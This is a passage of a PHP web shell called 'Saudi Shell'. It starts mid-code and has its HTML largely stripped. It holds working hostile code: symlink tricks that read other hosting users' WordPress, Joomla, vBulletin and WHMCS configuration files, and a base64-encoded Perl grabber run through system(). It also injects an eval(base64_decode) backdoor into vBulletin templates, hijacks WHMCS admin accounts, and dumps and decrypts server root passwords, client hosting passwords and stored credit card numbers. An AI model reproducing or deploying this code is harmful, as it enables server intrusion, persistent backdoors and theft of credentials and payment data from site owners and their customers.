"); } } ?> '.$_SERVER['HTTP_HOST'].' ~ Saudi Sh3ll '; echo '
Saudi Shell
'; $pg = basename(__FILE__); echo "OS : "; $safe_mode = @ini_get('safe_mode'); $dir = @getcwd(); $ip=$_SERVER['REMOTE_ADDR']; $ips=$_SERVER['SERVER_ADDR']; define('SWS','al-swisre'); if ($os) { } else { $os = @php_uname(); echo $os ; } echo "   [ Google ]"; echo "   [ exploit-db ]"; echo "
"; echo (($safe_mode)?("safe_mode  : ON"):("safe_mode: OFF")); echo "
disable_functions : "; if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{ echo "$df"; } echo "
Server : ".$_SERVER['SERVER_SOFTWARE']."
"; echo "PHP version : ".@phpversion()."
"; echo "Id : "."user = ".@get_current_user()." | uid= ".@getmyuid()." | gid= ".@getmygid()."
"; echo "Pwd : ".$dir."  ".wsoPermsColor($dir)."  [ Home ]


"; echo "Your ip : $ip    | ip server : $ips |  list site |  phpinfo |"; echo "
"); $ipb = @findit($read,""); $hostname = @findit($read,"Hostname:","
"); $isp = @findit($r3ad,"ISP"); echo "

File Manager

More info

Mysql Manager

bypass Security

Symlink

Connect Back

BruteForce

About Por
"; echo ' 		'; if(isset($_REQUEST['sws'])) { switch ($_REQUEST['sws']) { ////////////////////////////////////////////////// Symlink ////////////////////////////////////// case 'sm': $sws = 'al-swisre' ; $mk = @mkdir('sym',0777); $htcs = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any"; $f =@fopen ('sym/.htaccess','w'); @fwrite($f , $htcs); $sym = @symlink("/","sym/root"); $pg = basename(__FILE__); echo '
[ Symlink File ] [ User & Domains & Symlink ] [ Domains & Script ] [ Make Symlink Perl]


' ; ////////////////////////////////// file //////////////////////// $sws = 'al-swisre' ; if(isset($_REQUEST['sy'])) { switch ($_REQUEST['sy']) { /// Domains + Scripts /// case 'sec': $d00m = @file("/etc/named.conf"); if(!$d00m) { die (" can't read /etc/named.conf"); } else { echo "
"; foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all('#zone "(.*)"#', $dom, $domsws); flush(); if(strlen(trim($domsws[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0])); /////////////////////////////////////////////////////////////////////////////////// $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php"; $wpp=@get_headers($wpl); $wp=$wpp[0]; $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php"; $wpp2=@get_headers($wp2); $wp12=$wpp2[0]; /////////////////////////////// $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php"; $joo=@get_headers($jo1); $jo=$joo[0]; $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php"; $joo2=@get_headers($jo2); $jo12=$joo2[0]; //////////////////////////////// $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php"; $vbb=@get_headers($vb1); $vb=$vbb[0]; $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php"; $vbb2=@get_headers($vb2); $vb12=$vbb2[0]; $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php"; $vbb3=@get_headers($vb3); $vb13=$vbb3[0]; ///////////////// $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php"; $whh2=@get_headers($wh1); $wh=$whh2[0]; $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php"; $whh2=@get_headers($wh2); $wh12=$whh2[0]; $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php"; $whh3=@get_headers($wh3); $wh13=$whh3[0]; $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php"; $whh5=@get_headers($wh5); $wh15=$whh5[0]; $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php"; $whh4=@get_headers($wh4); $wh14=$whh4[0]; //////////////////////////////////////////////////////////////////////////////// ////////// Wordpress //////////// $pos = strpos($wp, "200"); $config=" "; if (strpos($wp, "200") == true ) { $config="Wordpress"; } elseif (strpos($wp12, "200") == true) { $config="Wordpress"; } ///////////WHMCS//////// elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true ) { $config=" WHMCS"; } elseif (strpos($wh12, "200") == true) { $config =" WHMCS"; } elseif (strpos($wh13, "200") == true) { $config =" WHMCS"; } ///////// Joomla to 4 /////////// elseif (strpos($jo, "200") == true) { $config=" Joomla"; } elseif (strpos($jo12, "200") == true) { $config=" Joomla"; } //////////vBulletin to 4 /////////// elseif (strpos($vb, "200") == true) { $config=" vBulletin"; } elseif (strpos($vb12, "200") == true) { $config=" vBulletin"; } elseif (strpos($vb13, "200") == true) { $config=" vBulletin"; } else { continue; } ///////////////////////////////////////////////////////////////////////////////////// $site = $user['name'] ; echo ""; flush(); exit; } } } } break; /// user + domine + symlink /// case 'sym': $d00m = @file("/etc/named.conf"); if(!$d00m) { die (" can't read /etc/named.conf"); } else { echo "
Domains Script
".$domsws[1][0]." ".$config."
"; foreach($d00m as $dom){ if(eregi("zone",$dom)){ preg_match_all('#zone "(.*)"#', $dom, $domsws); flush(); if(strlen(trim($domsws[1][0])) > 2){ $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0])); $site = $user['name'] ; @symlink("/","sym/root"); $site = $domsws[1][0]; $ir = 'ir'; $il = 'il'; if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) ) { $site = "
".$domsws[1][0]."
"; } echo " "; flush(); } } } } break; case 'pl': if (!is_dir('sa2')){ $mk = @mkdir('sa2',0777); if (is_file('sa2/perl.pl')) { echo "Symlink Perl"; @chmod('sa2/perl.pl',0755); } else { $f2 =@fopen ('sa2/perl.pl','w'); $sml_perl = "IyEvdXNyL2Jpbi9wZXJsIC1JL2hvbWUvYWxqbm9mcWUvcHVibGljX2h0bWwvdHJhZmlxL2dvbmZpZy5wbA0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8dGl0bGU+W35dIFBhaW4gU3ltbGluazwvdGl0bGU+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLm5ld1N0eWxlMSB7DQogZm9udC1mYW1pbHk6IFRhaG9tYTsNCiBmb250LXNpemU6IHgtc21hbGw7DQogZm9udC13ZWlnaHQ6IGJvbGQ7DQogY29sb3I6ICMwMEZGRkY7DQogIHRleHQtYWxpZ246IGNlbnRlcjsNCn0NCjwvc3R5bGU+DQo8L2hlYWQ+DQonOw0Kc3ViIGxpbHsNCiAgICAoJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nfn52QnVsbGV0aW4yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLid+fnZCdWxsZXRpbjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2MvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+dkJ1bGxldGluNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWcucGhwJywka29sYS4nfn5QaHBiYjEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW0vaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJ35+UGhwYmIyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dwLWNvbmZpZy5waHAnLCRrb2xhLid+fldvcmRwcmVzczEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvYmxvZy93cC1jb25maWcucGhwJywka29sYS4nfn5Xb3JkcHJlc3MyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGExLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fkpvb21sYTIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvam9vbWxhL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5Kb29tbGEzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htMS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG0yLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50L2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG00LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nfn5XaG01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLid+fldobTYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htNy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vcmRlci9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJ35+V2htOS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJ35+NS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25maWcucGhwJywka29sYS4nfn40LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJ35+aW52aXNpby50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlL2RiLnBocCcsJGtvbGEuJ35+Ny50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25uZWN0LnBocCcsJGtvbGEuJ35+OC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJ35+bWstcG9ydGFsZTEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9jb25maWcucGhwJywka29sYS4nfn4xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZXR0aW5ncy5waHAnLCRrb2xhLid+flNtZi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9pbmNsdWRlcy9mdW5jdGlvbnMucGhwJywka29sYS4nfn5waHBiYjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZS9kYi5waHAnLCRrb2xhLid+fmluZmluaXR5LnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQogIHJlYWQoU1RESU4sICRidWZmZXIsICRFTlZ7J0NPTlRFTlRfTEVOR1RIJ30pOw0KfSBlbHNlIHsNCiAgJGJ1ZmZlciA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KfQ0KQHBhaXJzID0gc3BsaXQoLyYvLCAkYnVmZmVyKTsNCmZvcmVhY2ggJHBhaXIgKEBwYWlycykgew0KICAoJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiAgJG5hbWUgPX4gdHIvKy8gLzsNCiAgJG5hbWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiAgJHZhbHVlID1+IHRyLysvIC87DQogICR2YWx1ZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KICAkRk9STXskbmFtZX0gPSAkdmFsdWU7DQp9DQppZiAoJEZPUk17cGFzc30gZXEgIiIpew0KcHJpbnQgJw0KPGJvZHkgY2xhc3M9Im5ld1N0eWxlMSIgYmdjb2xvcj0iIzAwMDAwMCI+DQogPGJyIC8+PGJyIC8+DQo8Zm9ybSBtZXRob2Q9InBvc3QiPg0KPHRleHRhcmVhIG5hbWU9InBhc3MiIHN0eWxlPSJib3JkZXI6MnB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogNTQzcHg7IGhlaWdodDogNDIwcHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGIiAgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDs8cD4NCjxpbnB1dCBuYW1lPSJ0YXIiIHR5cGU9InRleHQiIHN0eWxlPSJib3JkZXI6MXB4IGRvdHRlZCAjMDAzMzAwOyB3aWR0aDogMjEycHg7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQzsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6OHB0OyBjb2xvcjojRkZGRkZGOyAiICAvPjxiciAvPg0KJm5ic3A7PC9wPg0KPHA+DQo8aW5wdXQgbmFtZT0iU3VibWl0MSIgdHlwZT0ic3VibWl0IiB2YWx1ZT0iR2V0IENvbmZpZyIgc3R5bGU9ImJvcmRlcjoxcHggZG90dGVkICMwMDMzMDA7IHdpZHRoOiA5OTsgZm9udC1mYW1pbHk6VGFob21hOyBmb250LXNpemU6MTBwdDsgY29sb3I6I0ZGRkZGRjsgdGV4dC10cmFuc2Zvcm06dXBwZXJjYXNlOyBoZWlnaHQ6MjM7IGJhY2tncm91bmQtY29sb3I6IzBDMEMwQyIgLz48L3A+DQo8L2Zvcm0+PGJyIC8+PGJyIC8+UmlnaHRzIG9mIHRoaXMgcGVybCB0byBLYXJhciBhTFNoYU1pJzsNCn1lbHNlew0KQGxpbmVzID08JEZPUk17cGFzc30+Ow0KJHkgPSBAbGluZXM7DQpvcGVuIChNWUZJTEUsICI+dGFyLnRtcCIpOw0KcHJpbnQgTVlGSUxFICJ0YXIgLWN6ZiAiLiRGT1JNe3Rhcn0uIi50YXIgIjsNCmZvciAoJGthPTA7JGthPCR5OyRrYSsrKXsNCndoaWxlKEBsaW5lc1ska2FdICA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KIH0NCnByaW50Jzxib2R5IGNsYXNzPSJuZXdTdHlsZTEiIGJnY29sb3I9IiMwMDAwMDAiPg0KPHA+RG9uZSAhITwvcD4NCjxwPiZuYnNwOzwvcD4nOw0KaWYoJEZPUk17dGFyfSBuZSAiIil7DQpvcGVuKElORk8sICJ0YXIudG1wIik7DQpAbGluZXMgPTxJTkZPPiA7DQpjbG9zZShJTkZPKTsNCnN5c3RlbShAbGluZXMpOw0KcHJpbnQnPHA+PGEgaHJlZj0iJy4kRk9STXt0YXJ9LicudGFyIj48Zm9udCBjb2xvcj0iIzAwRkYwMCI+DQo8c3BhbiBzdHlsZT0idGV4dC1kZWNvcmF0aW9uOiBub25lIj5DbGljayBIZXJlIFRvIERvd25sb2FkIFRhciBGaWxlPC9zcGFuPjwvZm9udD48L2E+PC9wPic7DQp9DQp9DQogcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+Ijs="; $write = fwrite ($f2 ,base64_decode($sml_perl)); if ($write) { @chmod('sa2/perl.pl',0755); } echo "Symlink Perl"; } break; } /// home /// } } else { echo ' The file path to symlink







'; $pfile = $_POST['file']; $symfile = $_POST['symfile']; $symlink = $_POST['symlink']; if ($symlink) { @symlink("$pfile","sym/$symfile"); echo '
'.$symfile.''; exit; }else {exit;} } break; //////////////////////// mysql /////////////////////////////////////////////////////////////////////////////// case 'ms': $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; ////////////////// HEEEEEEEEEEEEERE /////////////////////////////////////////////// HEEEEEEEEEEEEERE ///////////////////////////// if ($_GET['show'] == 'tb'){ $host_c = $_COOKIE['host_mysql']; $user_c = $_COOKIE['user_mysql']; $pass_c = $_COOKIE['pass_mysql']; $db_c = $_COOKIE['db_mysql']; $con = @mysql_connect($host_c,$user_c,$pass_c); $sel = @mysql_select_db($db_c); if(!$sel){ echo "mysql connect error" ; exit;} $dbname = $db_c; $pTable = mysql_list_tables( $dbname ) ; $num = mysql_num_rows( $pTable ); echo "
DomainsUserssymlink
".$site."
".$user['name']." symlink
"; for( $i = 0; $i < $num; $i++ ) { $tablename = mysql_tablename( $pTable, $i ); $sq3l=mysql_query("select * from $tablename"); $c3t=mysql_num_rows($sq3l); echo " "; if ($tablename == 'template') { $secript = 'vb'; } else if ($tablename == 'wp_post') {$secript = 'wp';} else if ($tablename == 'jos_users') {$secript = 'jm';} else if ($tablename == 'tbladmins') {$secript = 'wh';} } if ($secript == 'vb') { echo '
Options vBulletin

[ Update Index ] [ Inject shell] [ Show members Information] '; } else if ($secript == 'wp') { echo '
Options Wordpress


[ Change admin ] [ Show members]'; } else if ($secript == 'wh'){ echo '
Options Whmcs


[ roots] [ Clients Hosting Account ] [ Cards]

[ tickets] [ ticket replies] [ Search ticket] [ Change admin ]'; } else{echo '
';} /////////////// cmd //////////////////////////////// echo "

[ baukup ] [ Inject css ]





[ Logout ]"; if (isset($_POST['cmd'])) { $sql = $_POST['sql']; $query =@mysql_query($sql,$con) or die; if ($query){echo "


CMD sql successfully
";} elseif(!$query) {echo "


CMD sql error
";} } exit; } ///////////////////// show cl /////////////// else if ($_GET['show'] == 'cl') { $host_c = $_COOKIE['host_mysql']; $user_c = $_COOKIE['user_mysql']; $pass_c = $_COOKIE['pass_mysql']; $db_c = $_COOKIE['db_mysql']; $con = @mysql_connect($host_c,$user_c,$pass_c); $sel = @mysql_select_db($db_c); $tb = $_GET['tb']; $col_sws = mysql_query("SHOW COLUMNS FROM $tb"); $num2 = mysql_num_rows( $col_sws ); echo "
Tables Rows
".$tablename."
".$c3t."
"; for( $i2 = 0; $i2 < $num2; $i2++ ){ $col = mysql_fetch_row($col_sws) ; $um_sws = $col[0]; echo "" ; $tit = mysql_query ("SELECT * FROM $tb" ); while ($row = mysql_fetch_assoc($tit)) { $cont = $row[$um_sws] ; echo "" ; } ; } exit; } if (isset($_COOKIE['host_mysql'])){ if (!isset($_GET['op'])){ echo " "; exit; } } else if (!isset($_COOKIE['host_mysql'])) { if (!isset($host)) { echo ' 




host :

user :

pass :

db   :
'; exit;} else { $host = $_POST['host']; $user = $_POST['user']; $pass = $_POST['pass']; $db = $_POST['db']; $con = @mysql_connect($host,$user,$pass) ; $sel = @mysql_select_db($db,$con); if (!$sel) { echo " MYSQL INFOTMATI NOT TREY "; } else { setcookie( "host_mysql", $host); setcookie( "user_mysql", $user); setcookie( "pass_mysql", $pass); setcookie( "db_mysql", $db); ob_end_flush(); echo " "; exit; }}} /////////////////////////////////// Options ///////////////////////////////////////// if (isset($_GET['op'])) { $op = $_GET['op']; $host_c = $_COOKIE['host_mysql']; $user_c = $_COOKIE['user_mysql']; $pass_c = $_COOKIE['pass_mysql']; $db_c = $_COOKIE['db_mysql']; $con3 =@mysql_connect($host_c,$user_c,$pass_c) or die ; $sedb3 =@mysql_select_db($db_c,$con3) or die; if (!$sedb3){echo "error in mysql connect "; exit;} /////// index vb //////// if ($op == 'in') { if (!isset($index)){ echo ' Your index :



'; } else if ($_POST['sql']) { $index =$_POST['index']; $index=str_replace("\'","'",$index); $crypt = "{\${eval(base64_decode(\'"; $crypt .= base64_encode("echo \"$index\";"); $crypt .= "\'))}}{\${exit()}}"; $sqlindex = "UPDATE `template` SET `template` = '$crypt'" or die; $query =@ mysql_query($sqlindex); if ($query) { echo "

Updated Index successfully
"; echo "[ Back ]"; exit; } else if (!$query) { echo "

Updated Index erorr
"; echo "[ Back ]"; exit; } } } /////// shelllll /////////// else if($op == 'sh') { if (!isset($_POST['ch'])) { echo '





'; } if (isset($_POST['sql'])){ $ch = $_POST['ch']; $shell = "DQoNCmVjaG8gJzxiPlsgYWwtc3dpc3JlIF0mbmJzcDsmbmJzcDtbIFNhdWRpIHNoZWxsIF08YnI+PGJyPjxicj48L2I+JzsgZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsgZWNobyAnPGlucHV0IHR5cGU9ImZpbGUiIG5hbWU9ImZpbGUiIHNpemU9IjUwIj48aW5wdXQgbmFtZT0iX3VwbCIgdHlwZT0ic3VibWl0IiBpZD0iX3VwbCIgdmFsdWU9IlVwbG9hZCI+PC9mb3JtPic7IGlmKCAkX1BPU1RbJ191cGwnXSA9PSAiVXBsb2FkIiApIHsgaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIHsgZWNobyAnPGI+VXBsb2FkIFN1Y2Nlc3MgISEhPC9iPjxicj48YnI+JzsgfSBlbHNlIHsgZWNobyAnPGI+VXBsb2FkIEZhaWwgISEhPC9iPjxicj48YnI+JzsgfSB9IA0KPz4=" ; $crypt = "{\${eval(base64_decode(\'"; $crypt .= "$shell"; $crypt .= "\'))}}{\${exit()}}"; if ($ch == 'faq'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'";} elseif ($ch == 'cal'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='CALENDAR'";} elseif ($ch == 'sea'){$sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='search_forums'";} $query =@ mysql_query($sqlfaq); if ($query) { echo "


Injection has been successfully
"; echo "[ Back ]"; exit; } else if (!$query) { echo "


Injection has been erorr !
"; echo "[ Back ]"; exit; } } } else if ($op == 'shm') { $sql = 'select * from `user`'; $query =@ mysql_query($sql); if ($query) { while ($row = mysql_fetch_assoc($query)) { echo "

Columns NameContent
$um_sws $cont
ID : user : pass : salt : email :
".$row['userid']." ".$row['username']." ".$row['password']." ".$row['salt']." ".$row['email']."
"; }} } else if ($op == 'out') { setcookie( "host_mysql", $host,time()-3600); setcookie( "user_mysql", $user,time()-3600); setcookie( "pass_mysql", $pass,time()-3600); setcookie( "db_mysql", $db,time()-3600); ob_end_flush(); echo " "; exit; } ///////////////////////////////// whmcs //////////////////////////////////////// else if ($op == 'hroot') { if (isset($_POST['viw'])) { $hash = $_POST['hash'] ; $query = mysql_query("SELECT * FROM tblservers"); echo "
hosting roots "; while($row = mysql_fetch_array($query)) { echo ""; } echo "
TypenocActiveIP AddressusernamePassword
{$row['type']}{$row['noc']}{$row['active']}{$row['ipaddress']}{$row['username']}".decrypt($row['password'], $hash)."
"; $query = mysql_query("SELECT * FROM tblhosting where username = 'root' or 'admin' or 'administrator'"); echo "

Clients roots "; while($row = mysql_fetch_array($query)) { echo ""; } echo "
IP AddressusernamePassword
{$row['dedicatedip']}{$row['username']}".decrypt($row['password'], $hash)."
"; echo "
[ Back ]"; exit; } else { echo'


encryption hash



'; exit; } } //////////// domine //////////// else if ($op == 'scard') { if (isset($_POST['viw'])) { $hash = $_POST['hash'] ; $query = mysql_query('select * from `tblclients`') ; echo "
"; while($v = mysql_fetch_array($query)) { echo " "; echo "
cardtype id firstname lastname email city ciuntry address1 lastlogin phonenumber datecreated cardnum startdate expdate
{$v['cardtype']} {$v['id']} {$v['firstname']} {$v['lastname']} {$v['email']} {$v['city']} {$v['ciuntry']} {$v['address1']} {$v['lastlogin']} {$v['phonenumber']} {$v['datecreated']} ".decrypt ($v['cardnum'], $hash)." ".decrypt ($v['startdate'], $hash)." ".decrypt ($v['expdate'], $hash)."
"; echo "
[ Back ]"; exit; } }else { echo'


encryption hash



'; exit; } } else if ($op == 'chost') { if (isset($_POST['viw'])) { $hash = $_POST['hash'] ; $query = mysql_query("SELECT * FROM tblhosting"); echo "
"; while($r = mysql_fetch_array($query)) { echo ""; } echo "
domainUsernamePassIP Address
{$r['domain']}{$r['username']} ".decrypt ($r['password'], $hash)."{$r['dedicatedip']}
"; echo "
[ Back ]"; exit; } else { echo'


encryption hash



'; exit; } } else if ($op == 'cadmin') { if (isset($_POST['viw'])) { $pass = md5($_POST['pass']); $user = $_POST['user']; $query =@mysql_query("UPDATE `tbladmins` SET `username` ='".$user."' WHERE ID = 1"); $query =@mysql_query("UPDATE `tbladmins` SET `password` ='".$pass."' WHERE ID = 1"); if ($query) { echo "

Updated admin successfully
"; echo "
[ Back ]"; exit; } else if (!$query) { echo "

Updated admin erorr
"; echo "
[ Back ]"; exit; } } else { echo'


user :

pass :

'; exit; } } else if ($op == 'trak') { $page = $_GET['page']; $numpr = 30; if(!$page){$page = 0;} $sql0 = mysql_query("Select * from tbltickets"); $num_r0s = mysql_num_rows($sql0); $sql = mysql_query("Select * from tbltickets order by id desc limit $page,$numpr"); $ap = 1; echo "

Page : "; for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr ) { if ($page != $s) { echo "$ap";} else {echo "$ap";} $ap ++; } echo "

"; while ($r3o = mysql_fetch_assoc($sql)) { $email = $r3o['email']; $date = $r3o['date']; $title = $r3o['title']; $message = $r3o['message']; echo "
"; echo "

"; echo "
email : $email date : $date title : $title
message $message
"; echo "
[ Back ]"; exit; } } else if ($op == 'rtrak') { $page = $_GET['page']; $numpr = 25; if(!$page){$page = 0;} $sql0 = mysql_query("Select * from tblticketreplies"); $num_r0s = mysql_num_rows($sql0); $sql = mysql_query("Select * from tblticketreplies order by id desc limit $page,$numpr"); $ap = 1; echo "

Page : "; for ($s = 0 ; $s < $num_r0s; $s = $s+$numpr ) { if ($page != $s) { echo "$ap";} else {echo "$ap";} $ap ++; } echo "

"; while ($r3o = mysql_fetch_assoc($sql)) { $email = $r3o['email']; $date = $r3o['date']; $message = $r3o['message']; echo "
"; echo "

"; echo "
email : $email date : $date
message $message
"; echo "
[ Back ]"; exit; } } /////////////////////////////////// backup ////////////////////////// else if ($op == 'bkup') { if (isset($_POST['viw'])) { $path = $_POST['path']; $domp = @backup_tables($path,$host_c,$user_c,$pass_c,$db_c); echo "

Create backup successfully

$path
"; echo "
[ Back ]"; exit; } else { echo'


path backup



